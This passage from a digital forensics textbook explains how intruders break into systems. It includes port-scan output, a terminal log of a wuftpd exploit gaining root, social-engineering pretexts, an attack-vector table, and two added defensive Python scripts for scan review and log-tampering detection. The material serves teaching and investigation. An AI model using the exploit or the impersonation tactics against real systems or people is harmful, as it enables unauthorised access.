19.1 How Computer Intruders Operate

The most straightforward way to break into a computer is to steal or guess a password. However, if this is not a viable option, an intruder can usually gather enough information about a system to gain access to it. The most basic way to gather information about a system is to use a port scanner as shown here:

    % probe_tcp_ports 192.168.52.2
    Host 192.168.52.2, Port 7 ("echo" service) connection ... open.
    Host 192.168.52.2, Port 9 ("discard" service) connection ... open.
    Host 192.168.52.2, Port 13 ("daytime" service) connection ... open.
    Host 192.168.52.2, Port 19 ("chargen" service) connection ... open.
    Host 192.168.52.2, Port 21 ("ftp" service) connection ... open.
    Host 192.168.52.2, Port 23 ("telnet" service) connection ... open.
    Host 192.168.52.2, Port 25 ("smtp" service) connection ... open.
    Host 192.168.52.2, Port 53 ("domain" service) connection ... open.
    Host 192.168.52.2, Port 69 connection ... open.
    Host 192.168.52.2, Port 79 ("finger" service) connection ... open.
    Host 199.168.52.2, Port 110 ("pop" service) connection ... open.

This basic TCP port scanner shows that, in addition to running an e-mail server on port 25, this computer has a number of other servers, including an FTP server on port 21 for people to transfer files to and from the computer, a finger server on port 79 that can give out information about individuals with accounts on the machine, and a POP server on port 110 for users to check their e-mail remotely. The operating system and server versions can often be inferred from this type of port scan, or by using a more advanced port scanner like nmap. Knowing the operating system and the services that are running on a computer is often all that is required, because certain services on certain operating systems are known to be vulnerable. For instance, the following shows an exploit that is freely available on the Internet being used to gain unauthorized access to an FTP server:

    % wuftpd-exploit -t 192.168.7.25 -s 0
    Target: 192.168.7.25 (ftp/<shellcode>):RedHat 6.2 with wuftpd 2.6.0(1)
    Return Address: 0x08075844, AddrRetAddr. 0xbfffb028, Shellcode: 152
    loggin into system..
    USER ftp
    331 Guest login ok, send your complete e-mail address as password.
    PASS <shellcode>
    230-Next time please use your e-mail address as your password
    230 Guest login ok, access restrictions apply.
    STEP 2 : Skipping, magic number already exists: [87,01:03,02:01,01:02,04]
    STEP 3 : Checking if we can reach our return address by format string
    STEP 4 : Ptr address test: 0xbfffb028 (if it is not 0xbfffb028 ^C me now)
    STEP 5 : Sending code.. this will take about 10 seconds.
    Press ^\ to leave shell
    Linux ftp-server.corpX.com 2.2.14-5.0 #1 Tue Mar 7 20:53:41 EST 2000 i586 unknown
    uid=0(root) gid=0(root) egid=50(ftp) groups=50(ftp)
    w
      8:54am  up 3 days,  12:21,   0 users, load average:   0.12,    0.09,  0.03
    USER     TTY        FROM             LOGIN@      IDLE   JCPU    PCPU   WHAT
    last
    ftp      ftpd7718      intruder.isp.com  Wed   Sep 20 08:52 still   logged in
    ftp      ftpd7291      helpsrv.smut.com  Tue   Sep 19 15:13 still   logged in
    reboot   system boot   2.2.14-5.0        Sat   Sep 16 20:33         (3 + 12:21)
    ftp      ftpd1120      203.235.121.105   Sun   Sep 10 04:08 - down  (1+21:32)
    ftp      ftpd833       mail2.txinc.com   Sat   Sep 9  21:39 - down  (2+04:02)
    reboot   system boot   2.2.14-5.0        Sat   Sep 9  12:21         (2+13:20)
    wtmp begins Thu Sep    7 17:59:03 2000
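The port scan output quoted above is also what a defender reviews first: every open legacy service is an exposure to close or firewall before someone finds a matching exploit. The following script is an added example, not code from the book; it parses scan lines in the probe_tcp_ports format and lists the services that need follow-up. The sample output and the table of ports-to-review (REVIEW_REASONS) are constructed assumptions for the example.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample in the format of the probe_tcp_ports output quoted
# above; the hosts and ports are illustrative, not real scan results.
SCAN_OUTPUT = """\
Host 192.168.52.2, Port 21 ("ftp" service) connection ... open.
Host 192.168.52.2, Port 22 ("ssh" service) connection ... open.
Host 192.168.52.2, Port 23 ("telnet" service) connection ... open.
Host 192.168.52.2, Port 25 ("smtp" service) connection ... open.
Host 192.168.52.2, Port 69 connection ... open.
Host 192.168.52.2, Port 79 ("finger" service) connection ... open.
Host 192.168.52.2, Port 110 ("pop" service) connection ... open.
"""

# One scan line; the ("name" service) part is absent for unknown ports (port 69 above).
LINE_RE = re.compile(
    r'^Host (?P<host>[\d.]+), Port (?P<port>\d+)'
    r'(?: \("(?P<service>[^"]+)" service\))? connection \.\.\. (?P<state>\w+)\.$'
)

# Ports whose services send credentials in the clear or disclose account
# details; this list is an assumption for the example, not from the text.
REVIEW_REASONS: Dict[int, str] = {
    21: "ftp: cleartext logins; anonymous access may be enabled",
    23: "telnet: cleartext sessions",
    69: "tftp: no authentication",
    79: "finger: discloses account information",
    110: "pop: cleartext mailbox passwords",
}

def parse_scan(text: str) -> List[dict]:
    """Return one record per open port; lines that do not match are skipped."""
    records = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m and m.group("state") == "open":
            records.append({"host": m.group("host"), "port": int(m.group("port")),
                            "service": m.group("service") or "unknown"})
    return records

def review(records: List[dict]) -> Dict[str, List[Tuple[int, str]]]:
    """Map each host to the open ports that warrant follow-up, with the reason."""
    findings: Dict[str, List[Tuple[int, str]]] = {}
    for r in records:
        reason = REVIEW_REASONS.get(r["port"])
        if reason:
            findings.setdefault(r["host"], []).append((r["port"], reason))
    return findings
```

Calling review(parse_scan(SCAN_OUTPUT)) on the sample flags ports 21, 23, 69, 79 and 110 for the host and leaves ssh and smtp alone.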

When intruders cannot access a system through known security holes, they use less technical methods to gain access. Intruders sometimes even dig through garbage for useful information. Intruders also try to get information using social engineering and reverse social engineering. Social engineering refers to any attempt to contact legitimate users of the target system and trick them into giving out information that can be used by the intruder to break into the system. For example, calling someone and pretending to be a new employee who is having trouble getting started can result in useful information like computer names, operating systems, and even some information about employee accounts. Alternatively, pretending to be a computer technician who is trying to fix a problem can also lead to useful information. There are many different ways to do this, including calling people claiming to be looking into a problem or going into the organization to look around. Some people will even make the mistake of giving out their passwords.

Reverse social engineering is any attempt to have someone in the target organization contact the intruder for assistance; instead of the intruder contacting them, they contact the intruder. For example, sending a memo announcing a "new" technical support e-mail address can result in a flood of information. The advantage of reverse social engineering is that a user who sought help and had the problem resolved has little reason to be suspicious, and is unlikely to report the incident to anyone.

Table 19.1 summarizes the various methods of approach and attack. The categories are not mutually exclusive: intruders may employ several of these attack vectors to achieve their goals.

Table 19.1: Different attack methods. (Dunne, Long, Casey 2000)

    ATTACK VECTOR NAME       DESCRIPTION
    Authentication bypass    Gaining access while avoiding standard authentication
    Authentication failure   Taking advantage of authentication systems which "fail open"
    Buffer overflows         Exploiting stack memory overwriting in networked server programs
    Password cracking        Brute-force, reverse-engineering, and "dictionary" based methods used to discover account passwords
    Password sniffing        Capturing account passwords via a network "tap"
    Session hijacking        Piggybacking on authorized user connections from the Internet into internal hosts and networks
    Social engineering       Impersonation of authorized personnel to gain access or network passwords
    Spoofing                 Having a computer masquerade as a different "trusted" computer to gain access
    Trojan horses            Malicious programs such as BackOrifice can provide "back doors" (unauthorized avenues for access) into hosts from the Internet

Many of the attack methods in Table 19.1 were discussed in earlier chapters such as buffer overflows in Chapter 15, session hijacking in Chapter 16, and IP spoofing in Chapter 17.

After intruders gain access to a computer, they may be able to compromise the administrator account (known as "root" on UNIX systems), thereby gaining unrestricted access to the entire system. In fact, certain security holes allow computer intruders to break into a computer and get root access in one step. With unlimited access to the system, it is possible for an offender to modify any information on the computer and so remove traces of the intrusion. Intruders may change the system clock, delete log files, and replace system components. There are specific computer programs, called rootkits, which automate the process of hiding a break-in, enabling a low-skilled offender to exhibit higher-skilled behavior. For example, the Rootkit[2] project is developing such a program for Windows machines. More sophisticated rootkits such as Knark, Sebek, and Suckit on Linux are emerging, making intrusion investigations even more challenging. Increasingly, criminals are using strong encryption on UNIX systems, such as encrypted RAM disks, Blowfish encryption in IRC eggdrop bots, and executables encrypted with Teso Burneye (Phrack 58, 2001), along with other "anti-forensic" tools, to make digital evidence examinations more difficult (Phrack 59, 2002).
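Two of the cover-up steps named above, resetting the system clock and deleting log entries, leave a trace in the logs themselves: timestamps that run backwards, or a silence longer than the host normally shows. The script below is an added example (not from the book) of checking a syslog excerpt for both; it relies on syslogd's periodic "-- MARK --" lines as a heartbeat. The log lines, the 20-minute MARK interval and the year 2000 (classic syslog stamps carry no year) are constructed assumptions.

```python
from datetime import datetime, timedelta
from typing import List, Tuple

# Constructed syslog excerpt, not from the book. syslogd writes a
# "-- MARK --" line at a fixed interval (assumed 20 minutes here), so a
# long silence or a timestamp that moves backwards stands out.
LOG = """\
Sep 20 08:00:00 ftp-server syslogd: -- MARK --
Sep 20 08:20:00 ftp-server syslogd: -- MARK --
Sep 20 08:40:00 ftp-server syslogd: -- MARK --
Sep 20 08:52:13 ftp-server ftpd[7718]: ANONYMOUS FTP LOGIN FROM intruder.isp.com
Sep 20 07:55:02 ftp-server syslogd: -- MARK --
Sep 20 10:40:00 ftp-server syslogd: -- MARK --
"""

MARK_INTERVAL = timedelta(minutes=20)
YEAR = 2000  # classic syslog lines carry no year; taken from the wtmp date above

def parse_line(line: str) -> Tuple[datetime, str]:
    """Split a syslog line into its timestamp and the rest of the message."""
    stamp = datetime.strptime(line[:15], "%b %d %H:%M:%S").replace(year=YEAR)
    return stamp, line[16:]

def find_anomalies(text: str) -> List[str]:
    """Flag timestamps that run backwards and over-long gaps between MARK lines."""
    anomalies: List[str] = []
    prev_stamp = prev_mark = None
    for n, line in enumerate(text.splitlines(), 1):
        stamp, msg = parse_line(line)
        if prev_stamp is not None and stamp < prev_stamp:
            anomalies.append(f"line {n}: timestamp goes backwards "
                             f"({prev_stamp:%H:%M:%S} -> {stamp:%H:%M:%S})")
        if msg.endswith("-- MARK --"):
            # Allow some jitter: flag only when more than 1.5 intervals have passed.
            if prev_mark is not None and stamp - prev_mark > MARK_INTERVAL * 1.5:
                anomalies.append(f"line {n}: {stamp - prev_mark} since the last MARK, "
                                 "entries may be missing")
            prev_mark = stamp
        prev_stamp = stamp
    return anomalies
```

On the sample, find_anomalies(LOG) reports the clock jump at line 5 and the gap before line 6; either one is a reason to compare the host's logs against copies held on a remote log server.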

Once an intruder has gained access to one computer on a network, it may be possible to gather additional information about a network and obtain passwords to other systems using a sniffer.

[2]http://www.rootkit.com




Digital Evidence and Computer Crime, Second Edition
ISBN: 0121631044
Year: 2003
Pages: 279
